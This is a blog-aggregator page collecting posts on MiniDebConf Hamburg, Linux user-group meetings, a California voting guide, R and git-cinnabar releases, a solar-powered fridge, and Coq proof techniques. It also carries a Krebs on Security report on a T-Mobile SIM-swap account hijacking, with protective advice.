Planet Russell

,

Planet DebianJoerg Jaspert: Mini DebConf Hamburg

Since Friday around noon time, I and my 6-year-old son are at the Mini DebConf in Hamburg. Attending together with my son is quite a different experience than plain alone or with also having my wife around. Though he is doing pretty good, it mostly means the day ends for me around 2100 when he needs to go to sleep.

Friday

Friday we had a nice train trip up here, with a change to schedule, needed to switch to local trains to actually get where we wanted. Still, arrived in time for lunch, which is always good, afterwards we first went to buy drinks for the days and discovered a nice playground just around the corner.

The evening, besides dinner, consisted of chatting, hacking and getting Nils busy with something - for the times he came to me. He easily found others around and is fast in socialising with people, so free hacking time for me.

Saturday

The day started with a little bit of a hurry to, as Nils suddenly got the offer to attend a concert in the Elbphilharmonie and I had to get him over there fast. He says he liked it, even though it didn’t make much sense. Met him later for lunch again, followed by a visit to the playground, and then finally hacking time again.

While Nils was off looking after other conference attendees (and appearently getting ice cream too), after attending the Salsa talk, I could hack on stuff, and that meant dozens of merge requests for dak got processed (waldi and lamby are on a campaign against flake8 errors, it appears).

Apropos Salsa: The gitlab instance is the best that happened to Debian in terms of collaboration for a long time. It allows a so much better handling of any git related stuff, its worlds between earlier and now.

Holger showed Nils and me the venue, including climbing up one of the towers, quite an adventure for Nils, but a real nice view from up there.

In the evening the dak master branch was ready to get merged into our deploy branch - and as such automagically deployed on all machines where we run. It consisted of 64 commits and appearently a bug, that thankfully I found a merge request to fix it from waldi in the morning.

Sunday

Started the morning, after breakfast, with merging the fixup for the bug, and getting it into the deploy branch. Also asked DSA to adjust group rights for the ftpteam, today we got one promotion from ftptrainee to ftpteam, everybody tell your condolences to waldi. Also added more ftptrainees as we got more volunteers, and removed inactive ones.

Soon we have to start our way back home, but I am sure to come back for another Mini Conf, if it happens again here.

Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV June 2018 Workshop: Being an Acrobat: Linux and PDFs

Jun 16 2018 12:30
Jun 16 2018 16:30
Jun 16 2018 12:30
Jun 16 2018 16:30
Location: 
Infoxchange, 33 Elizabeth St. Richmond

Portable Document Format (PDF) is a file format first specified by Adobe Systems in 1993. It was a proprietary format until it was released as an open standard on July 1, 2008, and published by the International Organization for Standardization.

This workshop presentation will provide various ways that PDF files can can be efficiently manipulated in Linux and other free software that may not be easy in proprietary operating systems or applications.

The meeting will be held at Infoxchange, 33 Elizabeth St. Richmond 3121.  Late arrivals please call (0421) 775 358 for access to the venue.

LUV would like to acknowledge Infoxchange for the venue.

Linux Users of Victoria is a subcommittee of Linux Australia.

June 16, 2018 - 12:30

read more

Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV June 2018 Main Meeting: VoxxedDays conference report

Jun 5 2018 18:30
Jun 5 2018 20:30
Jun 5 2018 18:30
Jun 5 2018 20:30
Location: 
Kathleen Syme Library, 251 Faraday Street Carlton VIC 3053

PLEASE NOTE NEW LOCATION

6:30 PM to 8:30 PM Tuesday, June 5, 2018
Meeting Room 3, Kathleen Syme Library, 251 Faraday Street Carlton VIC 3053

Speakers:

  • Andrew Pam, Voxxed Days conference report

Andrew will report on a conference he recently attended, covering Language-Level Virtualization with GraalVM, Aggressive Web Apps and more.

Many of us like to go for dinner nearby after the meeting, typically at Trotters Bistro in Lygon St.  Please let us know if you'd like to join us!

Linux Users of Victoria is a subcommittee of Linux Australia.

June 5, 2018 - 18:30

Planet DebianBen Hutchings: Help the Debian kernel team to help you

I gave the first talk this morning at Mini-DebConf Hamburg, titled "Help the kernel team to help you". I briefly described several ways that Debian users and developers can make it easier (or harder) for us to deal with their requests. The slides are up in on my talks page, and video should be available soon.

Planet DebianRuss Allbery: California state election

Hm, I haven't done one of these in a while. Well, time to alienate future employers and make awkward mistakes in public that I have to explain if I ever run for office! (Spoiler: I'm highly unlikely to ever run for office.)

This is only of direct interest to California residents. To everyone else, RIP your feed reader, and I'm sorry for the length. (My hand-rolled blog software doesn't do cut tags.) I'll spare you all the drill-down into the Bay Area regional offices. (Apparently we elect our coroner, which makes no sense to me.)

Propositions

I'm not explaining these because this is already much too long; those who aren't in California and want to follow along can see the voter guide.

Proposition 68: YES. Still a good time to borrow money, and what we're borrowing money for here seems pretty reasonable. State finances are in reasonable shape; we have the largest debt of any state for the obvious reason that we have the most people and the most money.

Proposition 69: YES. My instinct is to vote no because I have a general objection to putting restrictions on how the state manages its budget. I don't like dividing tax money into locked pools for the same reason that I stopped partitioning hard drives. That said, this includes public transit in the spending pool from gasoline taxes (good), the opposition is incoherent, and there are wide-ranging endorsements. That pushed me to yes on the grounds that maybe all these people understand something about budget allocations that I don't.

Proposition 70: NO. This is some sort of compromise with Republicans because they don't like what cap-and-trade money is being spent on (like high-speed rail) and want a say. If I wanted them to have a say, I'd vote for them. There's a reason why they have to resort to backroom tricks to try to get leverage over laws in this state, and it's not because they have good ideas.

Proposition 71: YES. Entirely reasonable change to say that propositions only go into effect after the election results are final. (There was a real proposition where this almost caused a ton of confusion, and prompted this amendment.)

Proposition 72: YES. I'm grumbling about this because I think we should get rid of all this special-case bullshit in property taxes and just readjust them regularly. Unfortunately, in our current property tax regime, you have to add more exemptions like this because otherwise the property tax hit (that would otherwise not be incurred) is so large that it kills the market for these improvements. Rainwater capture is to the public benefit in multiple ways, so I'll hold my nose and vote for another special exception.

Federal Offices

US Senator: Kevin de León. I'll vote for Feinstein in the general, and she's way up on de León in the polls, but there's no risk in voting for the more progressive candidate here since there's no chance Feinstein won't get the most votes in the primary. De León is a more solidly progressive candidate than Feinstein. I'd love to see a general election between the two of them.

State Offices

I'm omitting all the unopposed ones, and all the ones where there's only one Democrat running in the primary. (I'm not going to vote for any Republican except for one exception noted below, and third parties in the US are unbelievably dysfunctional and not ready to govern.) For those outside the state, California has a jungle primary where the top two vote-getters regardless of party go to the general election, so this is more partisan and more important than other state primaries.

Governor: Delaine Eastin. One always has to ask, in our bullshit voting system, whether one has to vote tactically instead of for the best candidate. But, looking at polling, I think there's no chance Gavin Newsom (the second-best candidate and the front-runner) won't advance to the general election, so I get to vote for the candidate I actually want to win, even though she's probably not going to. Eastin is by far the most progressive candidate running who actually has the experience required to be governor. (Spoiler: Newsom is going to win, and I'll definitely vote for him in the general against Villaraigosa.)

Lieutenant Governor: Eleni Kounalakis. She and Bleich are the strongest candidates. I don't see a ton of separation between them, but Kounalakis's endorsements are a bit stronger for me. She's also the one candidate who has a specific statement about what she plans to do with the lieutenant governor role of oversight over the university system, which is almost it's only actual power. (This political office is stupid and we should abolish it.)

Secretary of State: Alex Padilla. I agree more with Ruben Major's platform (100% paper ballots is the correct security position), but he's an oddball outsider and I don't think he can accomplish as much. Padilla has an excellent track record as the incumbant and is doing basically the right things, just less dramatically.

Treasurer: Fiona Ma. I like Vivek Viswanathan and support his platform, but Fiona Ma has a lot more political expertise and I think will be more effective. I look forward to voting for Viswanathan for something else someday.

Attorney General: Dave Jones. Xavier Becerra hasn't been doing a bad job fighting off bad federal policy, but that seems to be all that he's interested in, and he's playing partisan games with the office. He has an air of amateurishness and political hackery. Dave Jones holds the same positions in a more effective way, is more professional, and has done a good job as Insurance Commissioner.

Insurance Commissioner: Steve Poizner. I'm going to vote for the (former) Republican here. Poizner expressed some really bullshit views on immigration when he ran for governor (which he's apologized for). I wouldn't support him for a more political office. But he was an excellent insurance commissioner (see, for instance, the response to Blue Cross's rate increase request). I'm closer to Ricardo Lara politically, but in his statements to the press he comes across as a clown: self-driving car insurance problems, cannabis insurance, climate change insurance, and a bunch of other nonsense that makes me think he doesn't understand the job. The other democrat, Mahmood, seems like less of a partisan hack, but he's a virtual unknown. If this were an important partisan office, I'd hold my nose and vote for Lara, but the job of insurance commissioner is more to be an auditor and negotiator, and Poizner was really good at it.

Superintendent of Public Instruction: Tony Thurmond. The other front-runner is Marshall Tuck, who is a charter school advocate. I hate charter schools with the passion of a burning sun.

Local Measures

Regional Measure 3: YES. Even more hyper-local than the rest of this post, but mentioning it because it was a narrow call. Bridge tolls are regressive, and I'm not a big fan of raising them as opposed to, say, increasing property taxes (yes please) or income taxes. That said, taxing cars to pay for (largely) public transit is the direction the money should flow. It was thinly balanced for me, but the thrust of the projects won out over the distaste at the regressive tax.

,

Planet DebianRuss Allbery: Free software log (April 2018)

This is rather late since I got distracted by various other things including, ironically, releasing a bunch of software. This is for April, so doesn't include the releases from this month.

The main release I worked on was remctl 3.14, which fixed a security bug introduced in 3.12 with the sudo configuration option. This has since been replaced by 3.15, which has more thorough maintainer testing infrastructure to hopefully prevent this from happening again.

I also did the final steps of the release process for INN 2.6.2, although as usual Julien ÉLIE did all of the hard work.

On the Debian side, I uploaded a new rssh package for the migration to GitLab (salsa.debian.org). I have more work to do on that front, but haven't yet had the time. I've been prioritizing some of my own packages over doing more general Debian work.

Finally, I looked at my Perl modules on CPANTS (the CPAN testing service) and made note of a few things I need to fix, plus filed a couple of bugs for display issues (one of which turned out to be my fault and fixed in Git). I also did a bit of research on the badges that people in the Rust community use in their documentation and started adding support to DocKnot, some of which made it into the subsequent release I did this month.

Planet DebianDirk Eddelbuettel: RcppGSL 0.3.5

A maintenance update of RcppGSL just brought version 0.3.5 to CRAN, a mere twelve days after the RcppGSL 0.3.4. release. Just like yesterday's upload of inline 0.3.15 it was prompted by a CRAN request to update the per-package manual page; see the inline post for details.

The RcppGSL package provides an interface from R to the GNU GSL using the Rcpp package.

No user-facing new code or features were added. The NEWS file entries follow below:

Changes in version 0.3.5 (2018-05-19)

  • Update package manual page using references to DESCRIPTION file [CRAN request].

Courtesy of CRANberries, a summary of changes to the most recent release is available.

More information is on the RcppGSL page. Questions, comments etc should go to the issue tickets at the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Planet DebianMartín Ferrari: MiniDebConf Hamburg - Friday/Saturday

MiniDebCamp Hamburg - Friday 18/5, Saturday 19/5

Friday and Saturday have been very productive days, I love events where there is time to hack!

I had more chats about contributors.d.o with Ganneff and Formorer, and if all goes according to plan, soon salsa will start streaming commit information to contributors and populate information about different teams: not only about normal packaging repos, but also about websites, tools, native packages, etc.

Note that the latter require special configuration, and the same goes if you want to have separate stats for your team (like for the Go team or the Perl team). So if you want to offer proper attribution to members of your team, please get in touch!


I spent loads of time working on Prometheus packages, and finally today (after almost a year) I uploaded a new version of prometheus-alertmanager to experimental. I decided to just drop all the web interface, as packaging all the Elm framework would take me months of work. If anybody feels like writing a basic HTML/JS interface, I would be happy to include it in the package!

While doing that, I found bugs in the CI pipeline for Go packages in Salsa. Solving these will hopefully make the automatic testing more reliable, as API breakage is sadly a big problem in the Go ecosystem.


I am loving the venue here. Apart from hosting some companies and associations, there is an art gallery which currently has a photo exhibition called Echo park; there were parties happening last night, and tonight apparently there will be more. This place is amazing!

Comment

Planet DebianThorsten Glaser: Progress report from the Movim packaging sprint at MiniDebconf

Nik wishes you to know that the Movim packaging sprint (sponsored by the DPL, thank you!) is handled under the umbrella of the Debian Edu sprint (similarily sponsored) since this package is handled by the Teckids Debian Task Force, personnel from Teckids e.V.

After arriving, I’ve started collecting knowledge first. I reviewed upstream’s composer.json file and Wiki page about dependencies and, after it quickly became apparent that we need much more information (e.g. which versions are in sid, what the package names are, and, most importantly, recursive dependencies), a Wiki page of our own grew. Then I made a hunt for information about how to package stuff that uses PHP Composer upstream, and found the, ahem, wonderfully abundant, structured, plentiful and clear documentation from the Debian PHP/PEAR Packaging team. (Some time and reverse-engineering later I figured out that we just ignore composer and read its control file in pkg-php-tools converting dependency information to Debian package relationships. Much time later I also figured out it mangles package names in a specific way and had to rename one of the packages I created in the meantime… thankfully before having uploaded it.) Quickly, the Wiki page grew listing the package names we’re supposed to use. I created a package which I could use as template for all others later.

The upstream Movim developer arrived as well — we have quite an amount of upstream developers of various projects attending MiniDebConf, to the joy of the attendees actually directly involved in Debian, and this makes things much easier, as he immediately started removing dependencies (to make our job easier) and fixing bugs and helping us understand how some of those dependencies work. (I also contributed code upstream that replaces some Unicode codepoints or sequences thereof, such as 3⃣ or ‼ or 👱🏻‍♀️, with <img…/> tags pointing to the SVG images shipped with Movim, with a description (generated from their Unicode names) in the alt attribute.)

Now, Saturday, all dependencies are packaged so far, although we’re still waiting for maintainer feedback for those two we’d need to NMU (or have them upload or us take the packages over); most are in NEW of course, but that’s no problem. Now we can tackle packaging Movim itself — I guess we’ll see whether those other packages actually work then ☺

We also had a chance to fix bugs in other packages, like guacamole-client and musescore.

In the meantime we’ve also had the chance to socialise, discuss, meet, etc. other Debian Developers and associates and enjoy the wonderful food and superb coffee of the “Cantina” at the venue; let me hereby express heartfelt thanks to the MiniDebConf organisation for this good location pick!

Update, later this night: we took over the remaining two packages with permission from their previous team and uploader, and have already started with actually packaging Movim, discovering untold gruesome things in the upstream of the two webfonts it bundles.

Planet DebianMike Hommey: Announcing git-cinnabar 0.5.0 beta 3

Git-cinnabar is a git remote helper to interact with mercurial repositories. It allows to clone, pull and push from/to mercurial remote repositories, using git.

Get it on github.

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.5.0 beta 2?

  • Fixed incompatibilities with Mercurial >= 4.4.
  • Miscellaneous metadata format changes.
  • Move more operations to the helper, hopefully making things faster.
  • Updated git to 2.17.0 for the helper.
  • Properly handle clones with bundles when the repository doesn’t contain anything newer than the bundle.
  • Fixed tag cache, which could lead to missing tags.

Planet DebianDirk Eddelbuettel: inline 0.3.15

A maintenance release of the inline package arrived on CRAN today. inline facilitates writing code in-line in simple string expressions or short files. The package is mature and in maintenance mode: Rcpp used it greatly for several years but then moved on to Rcpp Attributes so we have a much limited need for extensions to inline. But a number of other package have a hard dependence on it, so we do of course look after it as part of the open source social contract (which is a name I just made up, but you get the idea...)

This release was triggered by a (as usual very reasonable) CRAN request to update the per-package manual page which had become stale. We now use Rd macros, you can see the diff for just that file at GitHub; I also include it below. My pkgKitten package-creation helper uses the same scheme, I wholeheartedly recommend it -- as the diff shows, it makes things a lot simpler.

Some other changes reflect both two user-contributed pull request, as well as standard minor package update issues. See below for a detailed list of changes extracted from the NEWS file.

Changes in inline version 0.3.15 (2018-05-18)

  • Correct requireNamespace() call thanks (Alexander Grueneberg in #5).

  • Small simplification to .travis.yml; also switch to https.

  • Use seq_along instead of seq(along=...) (Watal M. Iwasaki) in #6).

  • Update package manual page using references to DESCRIPTION file [CRAN request].

  • Minor packaging updates.

Courtesy of CRANberries, there is a comparison to the previous release.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

,

Planet DebianJoey Hess: fridge 0.1

Imagine something really cool, like a fridge connected to a powerwall, powered entirely by solar panels. What could be cooler than that?

How about a fridge powered entirely by solar panels without the powerwall? Zero battery use, and yet it still preserves your food.

That's much cooler, because batteries, even hyped ones like the powerwall, are expensive and innefficient and have limited cycles. Solar panels are cheap and efficient now. With enough solar panels that the fridge has power to cool down most days (even cloudy days), and a smart enough control system, the fridge itself becomes the battery -- a cold battery.

I'm live coding my fridge, with that goal in mind. You can follow along in this design thread on secure scuttlebutt, and my git commits, and you can watch real-time data from my fridge.

Over the past two days, which were not especially sunny, my 1 kilowatt of solar panels has managed to cool the fridge down close to standard fridge temperatures. The temperature remains steady overnight thanks to added thermal mass in the fridge. My food seems safe in it, despite it being powered off for 14 hours each night.

graph of fridge temperature, starting at 13C and trending downwards to 5C over 24 hours

(Numbers in this graph are running higher than the actual temps of food in the fridge, for reasons explained in the scuttlebutt thread.)

Of course, the longterm viability of a fridge that never draws from a battery is TBD; I'll know within a year if it works for me.

bunch of bananas resting on top of chest freezer fridge conversion

I've written about the coding side of this project before, in my haskell controlled offgrid fridge. The reactive-banana-automation library is working well in this application. My AIMS inverter control board and easy-peasy-devicetree-squeezy were other groundwork for this project.

CryptogramFriday Squid Blogging: Flying Squid

Flying squid are real.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Planet DebianAndrej Shadura: Goodbye Octopress, hello Pelican

Hi from MiniDebConf in Hamburg!

As you may have noticed, I don’t update this blog often. One of the reasons why this was happening was that until now it was incredibly difficult to write posts. The software I used, Octopress (based on Jekyll) was based on Ruby, and it required quite specific versions of its dependencies. I had the workspace deployed on one of my old laptops, but when I attempted to reproduce it on the laptop I currently use, I failed to. Some dependencies could not be installed, others failed, and my Ruby skills weren’t enough to fix that mess. (I have to admit my Ruby skills improved insignificantly since the time I installed Octopress, but that wasn’t enough to help in this case.)

I’ve spent some time during this DebCamp to migrate to Pelican, which is written in Python, packaged in Debian, and its dependencies are quite straighforward to install. I had to install (and write) a few plugins to make the migration easier, and port my custom Octopress Bootstrap theme to Pelican.

I no longer include any scripts from Twitter or Facebook (I made Tweet and Share button static links), and the Disqus comments are loaded only on demand, so reading this blog will respect your privacy better than before.

See you at MiniDebConf tomorrow!

Krebs on SecurityT-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account

T-Mobile is investigating a retail store employee who allegedly made unauthorized changes to a subscriber’s account in an elaborate scheme to steal the customer’s three-letter Instagram username. The modifications, which could have let the rogue employee empty bank accounts associated with the targeted T-Mobile subscriber, were made even though the victim customer already had taken steps recommended by the mobile carrier to help minimize the risks of account takeover. Here’s what happened, and some tips on how you can protect yourself from a similar fate.

Earlier this month, KrebsOnSecurity heard from Paul Rosenzweig, a 27-year-old T-Mobile customer from Boston who had his wireless account briefly hijacked. Rosenzweig had previously adopted T-Mobile’s advice to customers about blocking mobile number port-out scams, an increasingly common scheme in which identity thieves armed with a fake ID in the name of a targeted customer show up at a retail store run by a different wireless provider and ask that the number to be transferred to the competing mobile company’s network.

So-called “port out” scams allow crooks to intercept your calls and messages while your phone goes dark. Porting a number to a new provider shuts off the phone of the original user, and forwards all calls to the new device. Once in control of the mobile number, thieves who have already stolen a target’s password(s) can request any second factor that is sent to the newly activated device, such as a one-time code sent via text message or or an automated call that reads the one-time code aloud.

In this case, however, the perpetrator didn’t try to port Rosenzweig’s phone number: Instead, the attacker called multiple T-Mobile retail stores within an hour’s drive of Rosenzweig’s home address until he succeeded in convincing a store employee to conduct what’s known as a “SIM swap.”

A SIM swap is a legitimate process by which a customer can request that a new SIM card (the tiny, removable chip in a mobile device that allows it to connect to the provider’s network) be added to the account. Customers can request a SIM swap when their existing SIM card has been damaged, or when they are switching to a different phone that requires a SIM card of another size.

However, thieves and other ne’er-do-wells can abuse this process by posing as a targeted mobile customer or technician and tricking employees at the mobile provider into swapping in a new SIM card for that customer on a device that they control. If successful, the SIM swap accomplishes more or less the same result as a number port out (at least in the short term) — effectively giving the attackers access to any text messages or phone calls that are sent to the target’s mobile account.

Rosenzweig said the first inkling he had that something wasn’t right with his phone was on the evening of May 2, 2018, when he spotted an automated email from Instagram. The message said the email address tied to the three-letter account he’d had on the social media platform for seven years — instagram.com/par — had been changed. He quickly logged in to his Instagram account, changed his password and then reverted the email on the account back to his original address.

By this time, the SIM swap conducted by the attacker had already been carried out, although Rosenzweig said he didn’t notice his phone displaying zero bars and no connection to T-Mobile at the time because he was at home and happily surfing the Web on his device using his own wireless network.

The following morning, Rosenzweig received another notice — this one from Snapchat — stating that the password for his account there (“p9r”) had been changed. He subsequently reset the Instagram password and then enabled two factor authentication on his Snapchat account.

“That was when I realized my phone had no bars,” he recalled. “My phone was dead. I couldn’t even call 611,” [the mobile short number that all major wireless providers make available to reach their customer service departments].”

It appears that the perpetrator of the SIM swap abused not only internal knowledge of T-Mobile’s systems, but also a lax password reset process at Instagram. The social network allows users to enable notifications on their mobile phone when password resets or other changes are requested on the account.

But this isn’t exactly two-factor authentication because it also lets users reset their passwords via their mobile account by requesting a password reset link to be sent to their mobile device. Thus, if someone is in control of your mobile phone account, they can reset your Instagram password (and probably a bunch of other types of accounts).

Rosenzweig said even though he was able to reset his Instagram password and restore his old email address tied to the account, the damage was already done: All of his images and other content he’d shared on Instagram over the years was still tied to his account, but the attacker had succeeded in stealing his “par” username, leaving him with a slightly less sexy “par54384321,” (apparently chosen for him at random by either Instagram or the attacker).

As I wrote in November 2015, short usernames are something of a prestige or status symbol for many youngsters, and some are willing to pay surprising sums of money for them. Known as “OG” (short for “original” and also “original gangster”) in certain circles online, these can be usernames for virtually any service, from email accounts at Webmail providers to social media services like InstagramSnapchatTwitter and Youtube.

People who traffic in OG accounts prize them because they can make the account holder appear to have been a savvy, early adopter of the service before it became popular and before all of the short usernames were taken.

Rosenzweig said a friend helped him work with T-Mobile to regain control over his account and deactivate the rogue SIM card. He said he’s grateful the attackers who hijacked his phone for a few hours didn’t try to drain bank accounts that also rely on his mobile device for authentication.

“It definitely could have been a lot worse given the access they had,” he said.

But throughout all of this ordeal, it struck Rosenzweig as odd that he never once received an email from T-Mobile stating that his SIM card had been swapped.

“I’m a software engineer and I thought I had pretty good security habits to begin with,” he said. “I never re-use passwords, and it’s hard to see what I could have done differently here. The flaw here was with T-Mobile mostly, but also with Instagram. It seems like by having the ability to change one’s [Instagram] password by email or by mobile alone negates the second factor and it becomes either/or from the attackers point of view.”

Sources close to the investigation say T-Mobile is investigating a current or former employee as the likely culprit. The mobile company also acknowledged that it does not currently send customers an email to the email address on file when SIM swaps take place. A T-Mobile spokesperson said the company was considering changing the current policy, which sends the customer a text message to alert them about the SIM swap.

“We take our customers privacy and security very seriously and we regret that this happened,” the company said in a written statement. “We notify our customers immediately when SIM changes occur, but currently we do not send those notifications via email. We are actively looking at ways to improve our processes in this area.”

In summary, when a SIM swap happens on a T-Mobile account, T-Mobile will send a text message to the phone equipped with the new SIM card. But obviously that does not help someone who is the target of a SIM swap scam.

As we can see, just taking T-Mobile’s advice to place a personal identification number (PIN) on your account to block number port out scams does nothing to flag one’s account to make it harder to conduct SIM swap scams.

Rather, T-Mobile says customers need to call in to the company’s customer support line and place a separate “SIM lock” on their account, which can only be removed if the customer shows up at a retail store with ID (or, presumably, anyone with a fake ID who also knows the target’s Social Security Number and date of birth).

I checked with the other carriers to see if they support locking the customer’s current SIM to the account on file. I suspect they do, and will update this piece when/if I hear back from them. In the meantime, it might be best just to phone up your carrier and ask.

Please note that a SIM lock on your mobile account is separate from a SIM PIN that you can set via your mobile phone’s operating system. A SIM PIN is essentially an additional layer of physical security that locks the current SIM to your device, requiring you to input a special PIN when the device is powered on in order to call, text or access your data plan on your phone. This feature can help block thieves from using your phone or accessing your data if you lose your phone, but it won’t stop thieves from physically swapping in their own SIM card.

iPhone users can follow these instructions to set or change a device’s SIM PIN. Android users can see this page. You may need to enter a carrier-specific default PIN before being able to change it. By default, the SIM PIN for all Verizon and AT&T phones is “1111;” for T-Mobile and Sprint it should default to “1234.”

Be advised, however, that if you forget your SIM PIN and enter the wrong PIN too many times, you may end up having to contact your wireless carrier to obtain a special “personal unlocking key” (PUK).

At the very least, if you haven’t already done so please take a moment to place a port block PIN on your account. This story explains exactly how to do that.

Also, consider reviewing twofactorauth.org to see whether you are taking full advantage of any multi-factor authentication offerings so that your various accounts can’t be trivially hijacked if an attacker happens to guess, steal, phish or otherwise know your password.

One-time login codes produced by mobile apps such as Authy, Duo or Google Authenticator are more secure than one-time codes sent via automated phone call or text — mainly because crooks can’t steal these codes if they succeed in porting your mobile number to another service or by executing a SIM swap on your mobile account [full disclosure: Duo is an advertiser on this blog].

Update, May 19, 3:16 pm ET: Rosenzweig reports that he has now regained control over his original Instagram account name, “par.” Good on Instagram for fixing this, but it’s not clear the company has a real strong reporting process for people who find their usernames are hijacked.

Planet DebianJoachim Breitner: Proof reuse in Coq using existential variables

This is another technical post that is only of interest only to Coq users.

TL;DR: Using existential variable for hypotheses allows you to easily refactor a complicated proof into an induction schema and the actual proofs.

Setup

As a running example, I will use a small theory of “bags”, which you can think of as lists represented as trees, to allow an O(1) append operation:

Require Import Coq.Arith.Arith.
Require Import Psatz.
Require FunInd.

(* The data type *)
Inductive Bag a : Type :=
  | Empty : Bag a
  | Unit  : a -> Bag a
  | Two   : Bag a -> Bag a -> Bag a.

Arguments Empty {_}.
Arguments Unit {_}.
Arguments Two {_}.

Fixpoint length {a} (b : Bag a) : nat :=
  match b with
  | Empty     => 0
  | Unit _    => 1
  | Two b1 b2 => length b1 + length b2
  end.

(* A smart constructor that ensures that a [Two] never
   has [Empty] as subtrees. *)
Definition two {a} (b1 b2 : Bag a) : Bag a := match b1 with
  | Empty => b2
  | _ => match b2 with | Empty => b1
                       | _ => Two b1 b2 end end.

Lemma length_two {a} (b1 b2 : Bag a) :
  length (two b1 b2) = length b1 + length b2.
Proof. destruct b1, b2; simpl; lia. Qed.

(* A first non-trivial function *)
Function take {a : Type} (n : nat) (b : Bag a) : Bag a :=
  if n =? 0
  then Empty
  else match b with
       | Empty     => b
       | Unit x    => b
       | Two b1 b2 => two (take n b1) (take (n - length b1) b2)
       end.

The theorem

The theorem that I will be looking at in this proof describes how length and take interact:

Theorem length_take''':
  forall {a} n (b : Bag a),
  length (take n b) = min n (length b).

Before I dive into it, let me point out that this example itself is too simple to warrant the techniques that I will present in this post. I have to rely on your imagination to scale this up to appreciate the effect on significantly bigger proofs.

Naive induction

How would we go about proving this lemma? Surely, induction is the way to go! And indeed, this is provable using induction (on the Bag) just fine:

Proof.
  intros.
  revert n.
  induction b; intros n.
  * simpl.
    destruct (Nat.eqb_spec n 0).
    + subst. rewrite Nat.min_0_l. reflexivity.
    + rewrite Nat.min_0_r. reflexivity.
  * simpl.
    destruct (Nat.eqb_spec n 0).
    + subst. rewrite Nat.min_0_l. reflexivity.
    + simpl. lia.
  * simpl.
    destruct (Nat.eqb_spec n 0).
    + subst. rewrite Nat.min_0_l. reflexivity.
    + simpl. rewrite length_two, IHb1, IHb2. lia.
Qed.

But there is a problem: A proof by induction on the Bag argument immediately creates three subgoals, one for each constructor. But that is not how take is defined, which first checks the value of n, independent of the constructor. This means that we have to do the case-split and the proof for the case n = 0 three times, although they are identical. It’s a one-line proof here, but imagine something bigger...

Proof by fixpoint

Can we refactor the proof to handle the case n = 0 first? Yes, but not with a simple invocation of the induction tactic. We could do well-founded induction on the length of the argument, or we can do the proof using the more primitive fix tactic. The latter is a bit hairy, you won’t know if your proof is accepted until you do Qed (or check with Guarded), but when it works it can yield some nice proofs.

Proof.
  intros a.
  fix IH 2.
  intros.
  rewrite take_equation.
  destruct (Nat.eqb_spec n 0).
  + subst n. rewrite Nat.min_0_l. reflexivity.
  + destruct b.
    * rewrite Nat.min_0_r. reflexivity.
    * simpl. lia.
    * simpl. rewrite length_two, !IH. lia.
Qed.

Nice: we eliminated the duplication of proofs!

A functional induction lemma

Again, imagine that we jumped through more hoops here ... maybe some well-founded recursion with a tricky size measure and complex proofs that the measure decreases ... or maybe you need to carry around an invariant about your arguments and you have to work hard to satisfy the assumption of the induction hypothesis.

As long as you do only one proof about take, that is fine. As soon as you do a second proof, you will notice that you have to repeat all of that, and it can easily make up most of your proof...

Wouldn’t it be nice if you can do the common parts of the proofs only once, obtain a generic proof scheme that you can use for (most) proofs about take, and then just fill in the blanks?

Incidentally, the Function command provides precisely that:

take_ind
     : forall (a : Type) (P : nat -> Bag a -> Bag a -> Prop),
       (forall (n : nat) (b : Bag a), (n =? 0) = true -> P n b Empty) ->
       (forall (n : nat) (b : Bag a), (n =? 0) = false -> b = Empty -> P n Empty b) ->
       (forall (n : nat) (b : Bag a), (n =? 0) = false -> forall x : a, b = Unit x -> P n (Unit x) b) ->
       (forall (n : nat) (b : Bag a),
        (n =? 0) = false ->
        forall b1 b2 : Bag a,
        b = Two b1 b2 ->
        P n b1 (take n b1) ->
        P (n - length b1) b2 (take (n - length b1) b2) ->
        P n (Two b1 b2) (two (take n b1) (take (n - length b1) b2))) ->
       forall (n : nat) (b : Bag a), P n b (take n b)

which is great if you can use Function (although not perfect – we’d rather see n = 0 instead of (n =? 0) = true), but often Function is not powerful enough to define the function you care about.

Extracting the scheme from a proof

We could define our own take_ind' by hand, but that is a lot of work, and we may not get it right easily, and when we change out functions, there is now this big proof statement to update.

Instead, let us use existentials, which are variables where Coq infers their type from how we use them, so we don’t have to declare them. Unfortunately, Coq does not support writing just

Lemma take_ind':
  forall (a : Type) (P : nat -> Bag a -> Bag a -> Prop),
  forall (IH1 : ?) (IH2 : ?) (IH3 : ?) (IH4 : ?),
  forall n b, P n b (take n b).

where we just leave out the type of the assumptions (Isabelle does...), but we can fake it using some generic technique.

We begin with stating an auxiliary lemma using a sigma type to say “there exist some assumption that are sufficient to show the conclusion”:

Lemma take_ind_aux:
  forall a (P : _ -> _ -> _ -> Prop),
  { Hs : Prop |
    Hs -> forall n (b : Bag a), P n b (take n b)
  }.

We use the [eexist tactic])(https://coq.inria.fr/refman/proof-engine/tactics.html#coq:tacv.eexists) (existential exists) to construct the sigma type without committing to the type of Hs yet.

Proof.
  intros a P.
  eexists.
  intros Hs.

This gives us an assumption Hs : ?Hs – note the existential type. We need four of those, which we can achieve by writing

  pose proof Hs as H1. eapply proj1 in H1. eapply proj2 in Hs.
  pose proof Hs as H2. eapply proj1 in H2. eapply proj2 in Hs.
  pose proof Hs as H3. eapply proj1 in H3. eapply proj2 in Hs.
  rename Hs into H4.

we now have this goal state:

1 subgoal
a : Type
P : nat -> Bag a -> Bag a -> Prop
H4 : ?Goal2
H1 : ?Goal
H2 : ?Goal0
H3 : ?Goal1
______________________________________(1/1)
forall (n : nat) (b : Bag a), P n b (take n b)

At this point, we start reproducing the proof of length_take: The same approach to induction, the same case splits:

  fix IH 2.
  intros.
  rewrite take_equation.
  destruct (Nat.eqb_spec n 0).
  + subst n.
    revert b.
    refine H1.
  + rename n0 into Hnot_null.
    destruct b.
    * revert n Hnot_null.
      refine H2.
    * rename a0 into x.
      revert x n Hnot_null.
      refine H3.
    * assert (IHb1 : P n b1 (take n b1)) by apply IH.
      assert (IHb2 : P (n - length b1) b2 (take (n - length b1) b2)) by apply IH.
      revert n b1 b2 Hnot_null IHb1 IHb2.
